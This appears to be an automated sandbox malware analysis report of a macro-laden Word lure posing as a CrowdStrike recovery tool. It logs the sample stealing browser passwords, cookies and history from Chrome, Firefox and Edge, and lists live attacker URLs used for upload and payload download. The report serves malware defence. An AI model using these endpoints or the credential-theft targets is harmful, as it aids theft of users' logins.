Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

13_2_008B1775

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation,

16_2_00007FFD92CC8F40

Source: C:\Windows\SysWOW64\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\System32\rundll32.exe

Code function: \Google\Chrome\User Data\Default\Login Data

16_2_00007FFD92BE1290

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,	13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	13_2_008A699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	13_2_00898490
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	13_2_0087DEDF
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,	16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError,	16_2_00007FFD92C3DF49
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,	16_2_00007FFD92C37F90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	16_2_00007FFD92C543E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError,	16_2_00007FFD92C3E1E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,	33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	33_2_0087699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	33_2_00868490
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	33_2_0084DEDF

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.104.160.126	unknown	United States	63949	LINODE-APLinodeLLCUS	true
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6

Contacted Domains

Name	IP	Active
www.google.com	142.250.186.164	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.104.160.126:5000/Uploadss	true	Avira URL Cloud: safe	unknown
http://172.104.160.126:8099/payload2.txt	true	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	13_2_008AF02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash,	13_2_008AF820
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008AF860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_008A6400
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	13_2_008AEC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008A6591
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,	13_2_008A3EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	13_2_008AC6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC730 CryptHashData,	13_2_008AC730
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	13_2_008AC750
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C15E30 BCryptGenRandom,	16_2_00007FFD92C15E30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete,	16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,	16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C39500
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C15B90 BCryptGenRandom,	16_2_00007FFD92C15B90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C65EE0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash,	16_2_00007FFD92C65E90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C65F70
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainuser,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainuser,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc,	16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	16_2_00007FFD92C64530
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C645B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C645A0 CryptHashData,	16_2_00007FFD92C645A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	16_2_00007FFD92C5E990
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	16_2_00007FFD92C66EC0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash,	33_2_0087F820
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	33_2_0087F02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_0087F860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	33_2_00876400
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	33_2_0087EC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_00876591
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,	33_2_00873EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	33_2_0087C6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C730 CryptHashData,	33_2_0087C730
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	33_2_0087C750

Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_eb710474-e

Contains functionality to create an SMB header

Source: C:\Windows\System32\rundll32.exe

Code function: mov dword ptr [rbp+04h], 424D53FFh

16_2_00007FFD92C4D7E0

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2

Source:	Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp

Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,	16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,	16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	16_2_00007FFD92CCDD10

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
